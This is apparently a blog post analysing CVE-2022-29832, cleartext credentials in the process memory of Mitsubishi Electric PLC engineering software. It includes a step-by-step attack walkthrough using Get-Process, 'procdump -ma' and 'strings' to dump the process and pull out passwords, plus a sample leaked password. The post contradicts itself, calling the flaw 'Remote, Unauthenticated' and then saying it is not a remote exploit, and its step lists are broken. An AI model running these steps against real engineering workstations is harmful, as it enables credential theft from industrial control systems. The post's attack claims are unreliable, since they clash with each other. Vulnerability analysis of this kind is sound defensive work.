CVE-2022-29832 - Cleartext Storage of Sensitive Info in Mitsubishi Electric GX Works3/2/Developer – Exploit Breakdown and Practical Guide

Author: SIEM-Safe  
Date: 2024-06-30

Introduction

Industrial automation depends on software for programming and configuring controllers. Mitsubishi Electric’s GX Works3, GX Works2, and GX Developer are widely used to manage PLCs (Programmable Logic Controllers)—the brains behind many factories, energy plants, and infrastructure. But with popularity comes risk.

In 2022, a serious vulnerability CVE-2022-29832 was uncovered. This flaw allows unauthenticated users (no login required!) to grab sensitive info by taking advantage of how these tools store sensitive data in memory—specifically, they store project files for MELSEC controllers in readable (cleartext) form.

This article will break down the vulnerability, demo the exploitation basics, and provide you with reference links straight to the source.

Attack Type: Remote, Unauthenticated

In simple terms: Project files (often containing passwords and security settings for critical factory PLCs) are left in readable memory regions. If an attacker gains access, even without logging in, they can collect sensitive information from these processes.

The Threat: Why It Matters

If you can grab a project file or configuration for a safety CPU or Q/FX/L series PLC, you hold keys to the kingdom:

Reverse-engineer security settings or passwords

This goes beyond simple data leak—it’s about full control of automated physical systems.

Exploit Details

This is not a remote network exploit, but attacks from compromised endpoints (e.g., an infected engineer’s workstation) are straightforward:

1. Attacker gains access to a system running GX Works3/2/Developer.

Memory contents of the running process are dumped.

3. Sensitive info (project files, passwords) is readable in the dump, with no encryption or obfuscation.

Exploitation Example – Memory Dump with Task Manager & Strings

*Let’s see how an attacker could do this using native Windows tools and a free utility like Sysinternals’ VMMap or Procdump.*

1. Identify the Process

Let’s find the process for GX Works3 (example: GxWorks3.exe).

Get-Process | Where-Object { $_.ProcessName -like "*GxWorks3*" }

2. Dump the Process Memory

Download Sysinternals Procdump and run:

procdump -ma GxWorks3.exe

This command writes a full memory dump (including all cleartext strings) to a .dmp file.

Using the classic strings utility

strings GxWorks3.dmp > dump_strings.txt

Now open dump_strings.txt with a text editor and search for terms like password, access, or look for plaintext project data that references safety modules or Q/FX/L.

Example snippet you may see in the strings output

ProjectName: FactoryMain2024
[Settings]
Password=SuperSecret123
Module=Q03UDVCPU
SecurityLevel=4

Mitigation

Official Fix:  
As of the time of disclosure in Mitsubishi Electric’s Security Advisory, users should update to the latest software versions once patched.

Restrict physical and remote access to engineering workstations.

- Use endpoint security/AV to detect memory dumping tools.

NVD CVE Page:

https://nvd.nist.gov/vuln/detail/CVE-2022-29832

Mitsubishi Electric Advisory:

https://www.mitsubishielectric.com/en/ssl/products/industry/automation-solutions/security/advisory/2022/019.html

Sysinternals Suite (Procdump, Strings):

https://docs.microsoft.com/en-us/sysinternals/downloads/

Conclusion

CVE-2022-29832 shows how industrial automation security can hinge on the weakest link—local software practices. If you run automation or critical infrastructure, check your engineering stations, monitor access, and require the latest patches.

Remember: Most attacks start with an insider, phishing, or compromised PC—don’t give attackers an easy win by leaving your secrets in plain sight!

Timeline

Published on: 11/25/2022 00:15:00 UTC
Last modified on: 05/31/2023 07:15:00 UTC